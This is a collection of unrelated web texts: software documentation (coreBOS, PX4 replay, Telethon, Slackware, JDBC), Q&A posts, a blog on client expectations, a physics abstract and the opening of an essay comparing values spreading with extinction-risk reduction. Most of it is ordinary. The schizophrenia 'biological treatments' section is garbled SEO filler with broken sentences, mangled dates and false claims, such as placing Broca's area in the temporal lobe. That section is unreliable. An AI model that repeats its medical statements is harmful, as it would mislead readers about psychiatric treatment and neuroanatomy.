'.$_REQUEST['__module'].' - '.$_REQUEST['__crmid']); echo '%%%MSG%%%'.$smarty->fetch('applicationmessage.tpl'); As can be seen in the previous script the URI called will always receive two additional parameters: • __module the current module • __crmid the current crmid if it exists (detail view) The exact same idea is supported on the ListView using the runBAScriptFromListView function. This function will permit us to add a button on the list view that calls this function. The function will do the typical boilerplate of checking that at least one element is selected in the list and asking for confirmation to proceed if there are too many. It will then call the given URI and send the result to a callback function you must implement. This way you can concentrate on your functionality. Usually, on the list view, we are doing mass actions against a large set of selected records. For these cases, it isn't user friendly to launch a script that takes a long time to process and not give the user some feedback. Ideally, we will process each record selected and return some indication to the user. This is how the Mass edit feature works. It updates each record and returns the results in a progress information screen. coreBOS gives us a way to use that same functionality but sending our own messages as we process the list of selected records. To do this we have to create a business action that will execute the runBAScriptFromListViewSSE function. We use Server-Side Events for these long-running processes. Server-Side Events require us to create two scripts, one in javascript which will receive the messages and show them on screen and another in PHP that will be processing the records and sending the progress messages. There are a lot of resources on Server-Side Events and also on how to include custom code in coreBOS, so I am just going to explain an example of how this would work. The javascript function is really simple as it just has to receive the message and update the screen. It has to consider the “CLOSE” event, but since most of the screen processing already exists it looks like this: function run_customsse(e) { var message =; if ( == 'CLOSE') { __addLog('<br><b>' + alert_arr.ProcessFINISHED + '!</b>'); var pBar = document.getElementById('progressor'); pBar.value = pBar.max; //max out the progress bar } else { var pBar = document.getElementById('progressor'); pBar.value = message.progress; var perc = document.getElementById('percentage'); perc.innerHTML = message.progress + '% &nbsp;&nbsp;' + message.processed + '/' +; = (Math.floor(pBar.clientWidth * (message.progress/100)) + 15) + 'px'; we get the message in, use __addLog to post the message and update the progress bar (which should be made easier bu passing the information to __addLog to avoid the redundant boiler plate) The backend script is a bit more interesting, it will receive 1 parameter that gives us access to 4 more. The SSE_SOURCE_KEY parameter is a coreBOS Settings key where the runBAScriptFromListViewSSE has saved all the information the users selected on the ListView. So, when the user selects records in the screen and clicks on the button we have added, the runBAScriptFromListViewSSE function will gather 4 variables and save them in the coreBOS Settings key-value store. We do it this way because the amount of data may be too big to send via GET (which is the only method SSE accepts). The variables are: • ids: list of all the selected IDs separated by a semicolon • excludedRecords: list of IDs excluded from the set • viewname: custom view ID, the selected Filter active on screen • searchurl: any search conditions the user may have launched The script below will access all these variables and send them to the progress screen global $app_strings, $currentModule; function send_message($id, $message, $progress, $processed, $total) { $d = array('message' => $message , 'progress' => $progress, 'processed' => $processed, 'total' => $total); echo "id: $id" . PHP_EOL; echo 'data:'. json_encode($d) . PHP_EOL; echo PHP_EOL; $recordcount = count($_REQUEST)+3+4; $recordprocessed = 0; $id = 1; $progress = round($recordprocessed / $recordcount * 100, 0); $msg = $key.' => '.$value; send_message($id++, $msg, $progress, $recordprocessed, $recordcount); if ($key=='params') { $params = json_decode(vtlib_purify($value), true); foreach ($params as $pkey => $pvalue) { $msg = $pkey.' => '.$pvalue; if ($pkey=='SSE_SOURCE_KEY') { $SSE_SOURCE_KEY = $pvalue; $listparams = coreBOS_Settings::getSetting($SSE_SOURCE_KEY, null); $listparams = json_decode($listparams, true); foreach ($listparams as $lkey => $lvalue) { $msg = $lkey.' => '.$lvalue; send_message('CLOSE', $app_strings['processcomplete'], 100, $recordcount, $recordcount); Finally, we add two business actions to load the code: FOOTERSCRIPT The javascript code javascript:runBAScriptFromListViewSSE('customsse', 'Assets', run_customsse) Business Action::Launch workflow In order to make it even easier to add functionality inside coreBOS with business actions, you can also launch a workflow from one. This opens the possibilities enormously as almost anything that can be done from a workflow can be done from a business action link. Note that this will only work correctly when we can pass in a unique CRMID (or list of CRMIDs), as the workflow system requires a record to be able to get its context of execution. javascript:runBAWorkflow(workflowid, crmid) The crmid parameter can be: • a unique CRMID • a string with the word “RECORD” which will load the current record if available • a string with a list of CRMIDs separated by semi-colon ';' Note that if either the workflowid or the crmid are empty nothing will be done. Business Action::Developers Blocks coreBOS Documentación
global_05_local_5_shard_00002591_processed.jsonl/39648
I have two Sections on my site: Country and Alert. The Alert section has a relation with Country via an "Entries" field. An Alert represents something that is happening in a particular country for a period of time so it will have a post date and an expiry date. In my template, I want to show a list of the 5 Countries that have currently active Alerts (ideally ordered by the country with the latest Alert). I'm not sure how query across relationships in Craft (outside of using the relatedTo query, but that only allows you to related to one entry, not a number of entries)? It seems all relationships are handled in a separate relation table in the DB. How can I achieve an query such as this within a Craft template? OK, here is one solution I've come up with, which seems to work and (I think) avoids 1+ queries: {% set groups = craft.entries({ section: 'alert', with: [ }).orderBy('postDate desc').status('live').all() | group(alert => alert.country[0]) %} {% for country, alerts in groups | slice(0, 5) %} {{ country }} <!-- Cannot use country Entry --> {% for alert in alerts %} <li>{{ alert.title }}</li> {% endfor %} {% endfor %} I would prefer being able to handle this entirely in queries though | improve this answer | | • One problem here is that by using the group filter you lose access to the underlying Entry and can only make use of the string you group on. – Timmy O'Mahony Dec 4 '19 at 14:59 It's from the top of my head here so no idea if this is going to work, but my idea is: • Get all active alerts order by postDate (just their ID's to make it faster) • Retrieve all related countries and take the first 5 (You can do a relatedTo with more than 1 entry.) {% set alerts = craft.entries({ section: 'alert', orderBy: 'postDate desc', status: 'live' }).ids() %} {% set countries = craft.entries({ section: 'countries', relatedTo: alerts, limit: 5 }).all() %} | improve this answer | | Your Answer
global_05_local_5_shard_00002591_processed.jsonl/39691
Discuss biological treatments for schizophrenia In certain severe cases, some patients also respond to electroconvulsive therapy which has been shown to be safe and effective or transcranial magnetic stimulation TMS. The schema outlined above reflects the operation of the reward system, and as discussed in previous chapters, this system is believed to rely upon activity of catecholamines in fibers that arise from cells in the midbrain and project to various forebrain regions. See the Family-to-Family website for more program information and class schedules. Furthermore, there are other types of disorders that present symptoms that are also characteristic of schizophrenia. Inscientists reported that boys with one form of the MAOA gene, long associated with aggression and criminality, had a higher-than-normal risk of growing up to be antisocial or violent only if they were also neglected or abused as children. It is the more invasive form of biological therapy because it involves removal of brain tissue and the effects are irreversible, and sometimes unpredictable. Co-morbid substance use disorder[ edit ] Co-occurring substance misuse disorders, which are extremely common in bipolar patients can cause a significant worsening of bipolar symptomatology and can cause the emergence of affective symptoms. Damage to Broca's area of the left temporal lobe may lead to the inability to understand speech properly. InDanese et al. There is not enough room here to begin to do the vast amount of literature justice, but I will provide just a few key resources. Learn about the treatment plan, and find out what your role in it can be. This relationship has become even more impressive with the introduction of more drugs and the discovery of different dopamine receptor types D1, D2, and maybe even D3 and D4. Management of depression The discussion boards at schizophrenia. The part of the body that uses the most energy is the brain. For schizophrenia, cognitive-behavioral therapy has shown the most promise in conjunction with medication. Dizygotic or fraternal twins, like siblings, share about one half of the genetic information. These observations suggest that the hallucinations, which Bleuler considered to be a secondary symptom of schizophrenia, may involve non-dopamine systems that are not involved in the primary disorder. Folate is the one you can take. Reply Link Laura September 11,8: Over the course of a year, they nearly eliminated his palpitations, anxiety and obsessions. The neurochemical maps of the brain now include a column for coexisting peptides, and the presence of multiple transmitter substances seems to be more the rule than the exception e. Discuss Biological Treatments for Schizophrenia Essay C4 proteins, those found to be increased for those with "schizophrenia" in the Sekar et al. Among bipolar patients taking anticonvulsants, those on lamotrigine have a better cognitive profile than those on carbamazepine, valproate, topiramate, and zonisamide. Describe and evaluate at least two biological treatments for schizophrenia. There is no known cure for schizophrenia but there is treatment aimed at reducing the symptoms. What is psychosis? An early form of treatment of schizophrenia is Electro-convulsive Therapy (ECT) which was developed in the s. BJPsych Advances distils current clinical knowledge into a single resource, written and peer-reviewed by expert clinicians to meet the CPD needs of consultant psychiatrists. Each issue includes commissioned articles dealing with physical and biological aspects of treatment, psychological and sociological interventions, management issues and treatments specific to the different psychiatric. Source: Presentation by Dr. Ira Glick,"New Schizophrenia Treatments" Read below for an indepth explanation of the genetic and environmental factors linked to schizophrenia. Neither the biological nor the environmental (psycho-social) categories is completely determinant, and there is no specified amount of input that will ensure someone will or. The main goal of this class are to gain an introductory exposure to the nature of the psychiatric disorder known as schizophrenia as revealed by the scientific method. We will discuss a broad range of findings from the scientific investigation of biological and psychological factors related to. Outline and evaluate biological therapies for Schizophrenia This is an essay which received a A* 12/ well structured and coherent. Excellent writing style and including relevant critical evaluation and a. School of Biological Sciences Management of depression may involve a number of different therapies: medications, behavior therapy, and medical devices. Major depressive disorder, often referred to simply as "depression", is diagnosed more frequently in developed countries, where up to 20% of the population is affected at some stage of their lives. According to WHO (World Health Organization), depression is currently fourth. Discuss biological treatments for schizophrenia Rated 5/5 based on 28 review Biological Therapies for Schizophrenia by Maria McMaster on Prezi
global_05_local_5_shard_00002591_processed.jsonl/39693
System-wide Replay Based on ORB messages, it's possible to record and replay arbitrary parts of the system. Replay is useful to test the effect of different parameter values based on real data, compare different estimators, etc. The first thing that needs to be done is to identify the module or modules that should be replayed. Then, identify all the inputs to these modules, i.e. subscribed ORB topics. For system-wide replay, this consists of all hardware input: sensors, RC input, MAVLink commands and file system. All identified topics need to be logged at full rate (see logging). For ekf2 this is already the case with the default set of logged topics. It is important that all replayed topics contain only a single absolute timestamp, which is the automatically generated field timestamp. Should there be more timestamps, then they must be relative with respect to the main timestamp. For an example, see sensor_combined.msg. Reasons for this are given below. • First, choose the file to replay, and build the target (from within the PX4-Autopilot directory): export replay=<absolute_path_to_log_file.ulg> make px4_sitl_default This will create the output in a separate build directory build/px4_sitl_default_replay (so that the parameters don't interfere with normal builds). It's possible to choose any posix SITL build target for replay, the build system knows through the replay environment variable that it's in replay mode. • Add ORB publisher rules file in build/px4_sitl_default_replay/tmp/rootfs/orb_publisher.rules. This file defines which module is allowed to publish which messages. It has the following format: restrict_topics: <topic1>, <topic2>, ..., <topicN> module: <module> ignore_others: <true/false> It means that the given list of topics should only be published by <module> (which is the command name). Publications to any of these topics from another module are silently ignored. If ignore_others is true, then publications to other topics from <module> are ignored. For replay, we only want the replay module to be able to publish the previously identified list of topics. So for replaying ekf2, the rules file looks like this: restrict_topics: sensor_combined, vehicle_gps_position, vehicle_land_detected module: replay ignore_others: true This allows that the modules, which usually publish these topics, don't need to be disabled for replay. • Optional: setup parameter overrides in the file build/px4_sitl_default_replay/tmp/rootfs/replay_params.txt. This file should contain a list of <param_name> <value>, like: EKF2_GB_NOISE 0.001 By default, all parameters from the log file are applied. When a parameter changed during recording, it will be changed as well at the right time during replay. A parameter in the replay_params.txt will override the value and changes to it from the log file will not be applied. • Optional: copy dataman missions file from the SD card to the build directory. Only necessary if a mission should be replayed. • Start the replay: make px4_sitl_default jmavsim This will automatically open the log file, apply the parameters and start to replay. Once done, it will be reported and the process can be exited. Then the newly generated log file can be analyzed, it has _replayed appended to its file name. Note that the above command will show the simulator as well, but depending on what is being replayed, it will not show what's actually going on. It's possible to connect via QGC and e.g. view the changing attitude during replay. • Finally, unset the environment variable, so that the normal build targets are used again: unset replay Important Notes • During replay, all dropouts in the log file are reported. These have a negative effect on replay and thus it should be taken care that dropouts are avoided during recording. • It is currently only possible to replay in 'real-time', meaning as fast as the recording was done. This is planned to be extended in the future. • A message that has a timestamp of 0 will be considered invalid and not be replayed. EKF2 Replay This is a specialization of the system-wide replay for fast EKF2 replay. It will automatically create the ORB publisher rules and works as following: • Optionally set SDLOG_MODE to 1 to start logging from boot • Record the log • To replay: export replay_mode=ekf2 export replay=<abs_path_to_log.ulg> make px4_sitl none You can stop it after there's an output like: INFO [replay] Replay done (published 9917 msgs, 2.136 s) The parameters can be adjusted as well. They can be extracted from the log with (install pyulog with sudo pip install pyulog first): ulog_params -i "$replay" -d ' ' | grep -e '^EKF2' > build/px4_sitl_default_replay/tmp/rootfs/replay_params.txt Then edit the parameters in the file as needed and restart the replay process with make px4_sitl none. This will create a new log file. The location of the generated log is printed with a message like this: INFO [logger] Opened log file: rootfs/fs/microsd/log/2017-03-01/13_30_51_replayed.ulg When finished, use unset replay; unset replay_mode to exit the replay mode. Behind the Scenes Replay is split into 3 components: • a replay module • ORB publisher rules • time handling The replay module reads the log and publishes the messages with the same speed as they were recorded. A constant offset is added to the timestamp of each message to match the current system time (this is the reason why all other timestamps need to be relative). The command replay tryapplyparams is executed before all other modules are loaded and applies the parameters from the log and user-set parameters. Then as the last command, replay trystart will again apply the parameters and start the actual replay. Both commands do nothing if the environment variable replay is not set. The ORB publisher rules allow to select which part of the system is replayed, as described above. They are only compiled for the posix SITL targets. The time handling is still an open point, and needs to be implemented. results matching "" No results matching ""
global_05_local_5_shard_00002591_processed.jsonl/39695
MLH 'I demo'd' tessalating hexagonal stickers and the unfortunate incident in which one of our team members lost all of his. A resulting desire to digitize them. What it does Hosts digital versions of these stickers on a blockchain accessible via something like a web service (which we also created for demo purposes using Wix and Wixcode), and also by command line. How we built it Front End: Wix, WixCode, Javascript, JSON, CBOR Back End: Blockchain, Multichain API, Python Challenges we ran into Submitting this form Azure connection issues WixCode version control Integrating a complex custom API Accomplishments that we're proud of Building aesthetic front end in 24 hours Finding a novel blockchain use case and implementing it Writing bots that abstract the complexity of the blockchain for end users through Wix What we learned Multichain API Sleep scheduling What's next for HexLedger Pitching this concept to MLH, turning over an admin key for the blockchain, and seeing our concept implemented at future hackathons. Built With Share this project:
global_05_local_5_shard_00002591_processed.jsonl/39708
Publishing and Sharing Publishing your report so you can share it with others This feature requires use of the free Datapane Public hosted platform or a private Datapane for Teams instance Publish your report So far we've demonstrated how to build and view reports locally; however, one of the most powerful features of Datapane is the ability to publish your report straight from your code and share it directly with your team or the wider world. Once you've logged in to your chosen Datapane server, call report.publish(name='Your report name') in your script and your report will be published to your Datapane instance for viewing online. This will return the URL of the report that you can share. If we take the report from the previous example, all we need to do is change .save to .publish and choose a name for our report. To open the report afterwards automatically, set the open boolean parameter. Publishing a report prints the URL to standard out, and returns a report object. import pandas as pd import altair as alt import datapane as dp dataset = pd.read_csv('') df = dataset.groupby(['continent', 'date'])['new_cases_smoothed_per_million'].mean().reset_index() plot = alt.Chart(df).mark_area(opacity=0.4, stroke='black').encode( y=alt.Y('new_cases_smoothed_per_million:Q', stack=None), color=alt.Color('continent:N', scale=alt.Scale(scheme='set1')), report = dp.Report( #'report.html', open=True) report.publish(name='Covid Report', open=True) Once published, you can share the link with others so they can view your report and comment on it. Datapane Public provides a public reports repository, hence all reports created are viewable and shareable by default. In future sections, we will also explore how to embed your report into a range of other platforms so you can share it with a wider audience. Datapane for Teams provides additional options to share reports with team members only, or keep them fully private, along with expiring access tokens to share securely with select outside members - ideal for users who require privacy and security over their data and analysis.
global_05_local_5_shard_00002591_processed.jsonl/39709
Welcome to the Slackware Documentation Project Setting a Keyboard Layout Keyboard in the Console Keyboard layout is first set during the installation process where you're asked to choose a relevant keyboard map. This setting only applies to the console before you start the X server (GUI). It can be changed in /etc/rc.d/rc.keymap: As you can see above, I use the UK layout. More keyboard layouts can be found in the directory mentioned above. Please note that if you decide not to change the default layout (US) during the installation process, the file /etc/rc.d/rc.keymap will not be created. If, at a later stage, you need to change it, you will need to create that file, copy the above code and choose one of the keymaps available in the /usr/share/kdb/keymaps/ directory. Keyboard Layout in X Setting up a keyboard layout for X can be done in 2 ways: system-wide (regardless of your desktop environment or user) or on a desktop environment / window manager level. Setting the Layout System-wide Slackware 13.0 and 13.1 In Slackware 13.0 and 13.1 hal was responsible for keyboard mapping: Copy the relevant .fdi file to /etc/hal/fdi/policy/: Edit the file: vim /etc/hal/fdi/policy/10.keymap.fdi Replacing us with a keymap of your choice (in my case it is gb): <merge key=“input.xkb.layout” type=“string”>us</merge> <merge key=“input.xkb.layout” type=“string”>gb</merge> Slackware 13.37 and 14 From Slackware 13.37 on, udev has taken over keyboard mapping functions and the procedure has changed as well: Edit the 90-keyboard-layout.conf file specifying the layout (eg. gb): vim /etc/X11/xorg.conf.d/90-keyboard-layout.conf Section "InputClass" Identifier "keyboard-all" MatchIsKeyboard "on" MatchDevicePath "/dev/input/event*" Driver "evdev" Option "XkbLayout" "gb" #Option "XkbVariant" "" Option "XkbOptions" "terminate:ctrl_alt_bksp" You also need to restart X for the change to take effect. Setting the Layout in Particular Desktop Environments / Window Managers Some environments by default include GUI tools to set the keyboard layout while others require tweaking the startup files and a manual use of the setxkbmap command. You can use this command at any time if you want to change the keyboard layout in X. You might need to restart certain applications for the changes to take effect. This, for example, would switch your keyboard layout to Polish: setxkbmap pl Below are some ways of changing keyboard layouts within particular desktop environments or window managers. In Other Languages Translations of this page?: QR Code QR Code howtos:window_managers:keyboard_layout (generated for current page)
global_05_local_5_shard_00002591_processed.jsonl/39710
The Full API While you have access to this, you should always use the friendly methods listed on Client Reference unless you have a better reason not to, like a method not existing or you wanting more control. The TelegramClient doesn’t offer a method for every single request the Telegram API supports. However, it’s very simple to call or invoke any request. Whenever you need something, don’t forget to check the documentation and look for the method you need. There you can go through a sorted list of everything you can do. The reason to keep both and this documentation alive is that the former allows instant search results as you type, and a “Copy import” button. If you like namespaces, you can also do from import types, functions. Both work. All the examples in this documentation assume that you have from telethon import sync or import telethon.sync for the sake of simplicity and that you understand what it does (see Compatibility and Convenience for more). Simply add either line at the beginning of your project and it will work. You should also refer to the documentation to see what the objects (constructors) Telegram returns look like. Every constructor inherits from a common type, and that’s the reason for this distinction. Say client.send_message() didn’t exist, we could use the search to look for “message”. There we would find SendMessageRequest, which we can work with. Every request is a Python class, and has the parameters needed for you to invoke it. You can also call help(request) for information on what input parameters it takes. Remember to “Copy import to the clipboard”, or your script won’t be aware of this class! Now we have: from import SendMessageRequest If you’re going to use a lot of these, you may do: from import types, functions # We now have access to 'functions.messages.SendMessageRequest' We see that this request must take at least two parameters, a peer of type InputPeer, and a message which is just a Python string. How can we retrieve this InputPeer? We have two options. We manually construct one, for instance: from import InputPeerUser peer = InputPeerUser(user_id, user_hash) Or we call client.get_input_entity(): import telethon async def main(): peer = await client.get_input_entity('someone') Remember that await must occur inside an async def. Every full API example assumes you already know and do this. When you’re going to invoke an API method, most require you to pass an InputUser, InputChat, or so on, this is why using client.get_input_entity() is more straightforward (and often immediate, if you’ve seen the user before, know their ID, etc.). If you also need to have information about the whole user, use client.get_entity() instead: entity = await client.get_entity('someone') In the later case, when you use the entity, the library will cast it to its “input” version for you. If you already have the complete user and want to cache its input version so the library doesn’t have to do this every time its used, simply call telethon.utils.get_input_peer: from telethon import utils peer = utils.get_input_peer(entity) Since v0.16.2 this is further simplified. The Request itself will call client.get_input_entity for you when required, but it’s good to remember what’s happening. After this small parenthesis about client.get_entity versus client.get_input_entity(), we have everything we need. To invoke our request we do: result = await client(SendMessageRequest(peer, 'Hello there!')) Message sent! Of course, this is only an example. There are over 250 methods available as of layer 80, and you can use every single of them as you wish. Remember to use the right types! To sum up: result = await client(SendMessageRequest( await client.get_input_entity('username'), 'Hello there!' This can further be simplified to: result = await client(SendMessageRequest('username', 'Hello there!')) # Or even result = await client(SendMessageRequest(PeerChannel(id), 'Hello there!')) Note that some requests have a “hash” parameter. This is not your api_hash! It likely isn’t your self-user .access_hash either. It’s a special hash used by Telegram to only send a difference of new data that you don’t already have with that request, so you can leave it to 0, and it should work (which means no hash is known yet). For those requests having a “limit” parameter, you can often set it to zero to signify “return default amount”. This won’t work for all of them though, for instance, in “” it will actually return 0 items. Requests in Parallel The library will automatically merge outgoing requests into a single container. Telegram’s API supports sending multiple requests in a single container, which is faster because it has less overhead and the server can run them without waiting for others. You can also force using a container manually: async def main(): # Letting the library do it behind the scenes await asyncio.wait([ client.send_message('me', 'Hello'), client.send_message('me', ','), client.send_message('me', 'World'), client.send_message('me', '.') # Manually invoking many requests at once await client([ SendMessageRequest('me', 'Hello'), SendMessageRequest('me', ', '), SendMessageRequest('me', 'World'), SendMessageRequest('me', '.') Note that you cannot guarantee the order in which they are run. Try running the above code more than one time. You will see the order in which the messages arrive is different. If you use the raw API (the first option), you can use ordered to tell the server that it should run the requests sequentially. This will still be faster than going one by one, since the server knows all requests directly: await client([ SendMessageRequest('me', 'Hello'), SendMessageRequest('me', ', '), SendMessageRequest('me', 'World'), SendMessageRequest('me', '.') ], ordered=True) If any of the requests fails with a Telegram error (not connection errors or any other unexpected events), the library will raise telethon.errors.common.MultiError. You can except this and still access the successful results: from telethon.errors import MultiError await client([ SendMessageRequest('me', 'Hello'), SendMessageRequest('me', ''), SendMessageRequest('me', 'World') ], ordered=True) except MultiError as e: # The first and third requests worked. first = e.results[0] third = e.results[2] # The second request failed. second = e.exceptions[1]
global_05_local_5_shard_00002591_processed.jsonl/39711
Use JDBC to interact with databases in a standard manner. Java Database Connectivity (JDBC) is a Java standard API that allows applications to interact with databases in a standard manner. ThoughtSpot has JDBC support through a JDBC driver that we provide. Connector type There are different types of JDBC connectors. Driver types categorize the technology used to connect to the database. The ThoughtSpot JDBC drive is a type 4 connector. It uses Java to implement a networking protocol for communicating with ThoughtSpot. This driver is Java driver. There is no client installation or configuration. When to use JDBC JDBC can be used whenever you want to connect to ThoughtSpot to insert data programmatically from a Java program or application. You should begin by using the ThoughtSpot Loader for initial data loads and then use JDBC for incremental loads. This is because the ThoughtSpot Loader is generally faster than JDBC. Information on using the ThoughtSpot Loader is available in the ThoughtSpot Administrator Guide. Version Compatibility To ensure compatibility, always use the JDBC driver with the same version number as the ThoughtSpot instance to which you are connecting. Performance Considerations These are some general recommendations for maximizing the performance of JDBC: • Insert in batches rather than doing single inserts at a time using the PreparedStatement::addBatch() and PreparedStatement::executeBatch commands. • If you need to upload a lot of data, consider running multiple connections with batch inserts in parallel.
global_05_local_5_shard_00002591_processed.jsonl/39712
Page tree Skip to end of metadata Go to start of metadata As of March 1, 2014, xmllicgen uses internet clock check; therefore, a connection to the internet is required to be able to successfully generate a license. You generate licenses using xmllicgen, the license generator provided with LM-X. To generate a license: 1. Modify the sample file detailed.xml, floating.xml or nodelocked.xml (as detailed in the following sections) to fit your specific business model. 2. Execute the license generator by typing the following command: xmllicgen [options] xml_file You can specify the following option to use the specified file to set and override the output file setting in the XML file: -output file As an alternative to specifying the output file path at the command line, you can specify this information in the XML file (using the optional attribute OUTPUTFILE, as described in LICENSEFILE tag). If xmllicgen succeeds in creating a license, it returns the error code 0. If xmllicgen fails, it returns the error code 1.
global_05_local_5_shard_00002591_processed.jsonl/39744
How to Get Clients to Behave (and Still Love You) You love your clients…most of the time.  Sometimes they are really aggravating!  They can be late, uncooperative, or unresponsive.  They can be overly demanding (like when they ask for the moon and budget for marbles).  I want to share strategies to keep your clients in line, so you both end up thrilled with the results. Set Clear Expectations Upfront The number one way to stay out of trouble is to set clear expectations with your clients upfront.  When you’re both on the same page from the outset, you avoid the surprises which create conflict. When you begin with a new client, lay out the “rules of engagement.”  You’ll find that most clients like to follow your rules.  Rules provide us with a sense of predictability and security.  They also create confidence in your process: if the client does X, Y, and Z, they can expect great results. If there is a timeline to be followed, include it in your initial proposal.  If there are limitations or exclusions to your service, include these in the Scope of Work.  Just like you see a store’s Return Policy prominently displayed by the cash register.  Clarity up front avoids surprises down the line. Restate Expectations throughout the Process In your client interactions, there are a lot of moving parts.  Repetition is the key to make sure important expectations are being heard.  Include a review of key policies in your new client welcome process.  For example, my cancellation policy is in my Service Agreement, again in my Welcome Letter, and I mention it during my first meeting with each new client. Did you know Starbucks is training us to order in the “correct” sequence?  Every time you order, the cashier repeats it in the way they want you to order it next time.  If you order a “medium decaf mocha with two shots,” they barista echoes, “decaf double grande mocha.”  Guess what–that sequence matches the order of the boxes they fill out on the side of the cup.  So as they train you to say it “correctly,” they reduce errors and move the line faster. Feel Free to Make Exceptions … and Take Credit for Them Having clear policies & procedures need not make you inflexible.  Quite the contrary, it allows you to seem like a saint when you decide to make an exception.  When you let the customer know you’re bending the rules for them, they will be very appreciative! Just make it clear you’re making the exception.  “This payment is past due.  I’m happy to waive the late fee, as long as you get it to me this week.”  “Oh, thank you!”  Compare that to not having a clear timeline and late fee.  Then all you can do is nag. Action Plan Just like walls make good neighbors, clear & up front expectations make good client relationships.  (Click here to tweet that!)  Take a few minutes now to list some policies or expectations that would help your client interactions run smoother.  Then, incorporate them into your proposals and throughout your workflow, so your clients know how to behave for optimal results!
global_05_local_5_shard_00002591_processed.jsonl/39758
Hannes Olof Gosta Alfven (redirected from Alfvén, Hannes Olof Gösta) Also found in: Dictionary, Medical. Alfvén, Hannes Olof Gösta, 1908–95, Swedish physicist, Ph.D. Univ. of Uppsala, 1934. He was a lecturer at Uppsala from 1934 to 1937 and a researcher at the Nobel Institute of Physics from 1937 to 1940. In 1940 he joined the faculty at the Royal Institute of Technology, Stockholm, remaining there until his retirement in 1991. From 1967 to 1991 he also was a professor at the Univ. of California, San Diego. Alfvén shared the 1970 Nobel Prize in Physics with Louis Néel for his research on magnetohydrodynamics, a field that studies the dynamics of electrically conducting fluids such as plasmas, liquid metals, and salt water. His work has had important applications in the field of plasmaplasma, ..... Click the link for more information.
global_05_local_5_shard_00002591_processed.jsonl/39778
My Uk old style paper driving licence has expired due to being over 70, and I now permanently live in South Africe. Can I renew my UK driving licence and change it to a new photo style at the same time? • 1 The renewal page says you need to list your last addresses for the last 3 years. I assume they need to be UK ones. Are you able to do that? On another website, someone queried DVLA who said you must be resident in the UK to renew a drivers licence. – mkennedy Jun 5 '17 at 19:14 • 1 If you're permanently resident in ZA, shouldn't you be applying for a ZA drivers license (and possibly endure the 'dreaded' K53 like the locals do if your UK license isn't 'transferable')? – brhans Jun 5 '17 at 19:19 • 1 From the relevant page on the gov.za web site: "If you have been granted South African permanent residence, you must convert your foreign driving licence to a South African one within a year of receiving your permanent residence permit.". – brhans Jun 5 '17 at 19:26 • Would you guys be able to move these comments to an answer? – ouflak Jun 6 '17 at 6:32 No. You need to get a South African licence. From gov.uk: You can use this service to renew your British driving licence if you’re 70 or over, or will be 70 in the next 90 days, and: • you’re a resident of Great Britain If you’re moving abroad | improve this answer | | Your Answer
global_05_local_5_shard_00002591_processed.jsonl/39779
Deflagration and Detonation in Solid-Solid Combustion Hendrik J. Viljoen, Vladimir Hlavacek Research output: Contribution to journalArticlepeer-review 3 Scopus citations Solid-solid combustion becomes self-sustaining when the preheating of the fresh mixture is high enough to support a spontaneous chemical reaction. These reactions have high activation energies, requiring significant preheating. Traditionally, conduction has been considered as the main form of preheating, and propagation velocities in the order of a few mm to a few cm per second were found. When acoustic equations are included in the analysis, no significant changes occur for traditional SHS reactions. However, the analysis of a 1-D model propagating at a constant velocity reveals the existence of two other solutions with propagation velocities which are much faster. An SHS deflagration wave is found with combustion temperature lower than the adiabatic value. The propagation velocity is less than the longitudinal sound speed of the medium, but typical Mach numbers vary between 0.6 and 0.95. The third solution is an SHS detonation with temperature above the adiabatic value and supersonic propagation velocity. Since the heat fluxes are extremely high, the hyperbolic conduction model is used. Original languageEnglish (US) Pages (from-to)3085-3094 Number of pages10 JournalAIChE Journal Issue number11 StatePublished - Nov 1997 ASJC Scopus subject areas • Biotechnology • Environmental Engineering • Chemical Engineering(all) Fingerprint Dive into the research topics of 'Deflagration and Detonation in Solid-Solid Combustion'. Together they form a unique fingerprint. Cite this
global_05_local_5_shard_00002591_processed.jsonl/39828
Skip to main content Report Issue Switch to the legacy player Poster Image Rated: 6.4 out of 10 with 183 votes. An Oakland widower's thirst for justice is rekindled when a local killing is oddly similar to his wife's unsolved murder from decades ago. Show More Show Less Release Date: Directed by:Andre Welsh
global_05_local_5_shard_00002591_processed.jsonl/39843
Note: When I speak of extinction risk in this essay, it refers not just to complete extinction but to any event that collapses civilization to the point where we cannot achieve highly good outcomes for the far future. There are two major interventions for shaping the far future: reducing human extinction risk and spreading good values. Although we don’t really know how to reduce human extinction, the problem itself is fairly clear and has seen a lot of discussion among effective altruists. Values spreading is less clear. A lot of EA activities could be classified as values spreading, but of very different sorts. Meta-organizations like Giving What We Can and Charity Science try to encourage people to value charity more highly; animal charities like The Humane League and Animal Ethics try to get people to assign greater weight to non-human animals. Many supporters of animal welfare interventions believe that these interventions have a large positive effect on the far future via spreading values that cause people to behave in ways that make the world better. I believe that reducing extinction risk has a higher expected value than spreading good values, and there are a number of concerns with values spreading that make me reluctant to support it. This essay lays out my reasoning. Personal note: In 2014 I directed my entire donations budget to The Humane League, and in 2015 I directed it to Animal Charity Evaluators. At the time, I generally agreed with the arguments that values spreading is the most important intervention. But recently I have considered this claim more carefully and now I am more skeptical, for the reasons outlined below. The Upside of Values Spreading In “Values Spreading Is Often More Important than Extinction Risk”, Brian Tomasik lays out a mathematical intuition for the claim that values spreading has a much higher impact than preventing extinction risk. If we can slightly increase the probability of creating vastly good outcomes in the far future, this could be higher impact than preventing extinction, since the difference between all-humans-are-dead and business-as-usual is probably smaller than the difference between business-as-usual and everything-is-as-good-as-possible. He also claims that values spreading is easier than preventing extinction risk: the best future would be filling the universe with beings that constantly feel euphoria, but this strikes most people as boring and undesirable, so it’s not a popular belief. Thus, increasing the number of people who hold this belief is relatively easy–if one thousand people believe something, convincing 1% more people is a lot easier than if one million people believe it (because it requires convincing only 10 people rather than 10,000). I have some concerns with this line of reasoning, and I generally believe that focusing on preventing extinction risk is more important (although I’m not confident about this conclusion–I believed the opposite about a month before I started writing this). In this essay I lay out some of my concerns and reasons to prefer working on reducing extinction risk over values spreading. Uncertainty About Values Spreading Brian’s mathematical argument in favor of values spreading over existential risk reduction has no obvious flaws, but it is not robust and its inputs derive from the reader’s intuition rather than empirical evidence about existing values and how easy they are to change. I put weak credence in this argument in particular. I have additional concerns with values spreading efforts in general. In many cases, spreading values is a zero-sum game played against other people spreading different values. (For example, I believe that the best thing to do is to fill the universe with tiny beings experiencing maximum possible happiness, but someone else might think this is a terrible outcome, so we both want to change each other’s mind.) As a general principle, we should be careful about playing zero-sum games rather than reaping gains from cooperation. We should only spread values if we are highly confident that we have the correct values. (I feel sufficiently confident about the fact that (many) non-human animals have value, but not sufficiently confident that we should fill the universe with tiny happy beings.) I have reflected carefully on my values and feel fairly strongly about them. I believe I have reflected more carefully about my values than perhaps 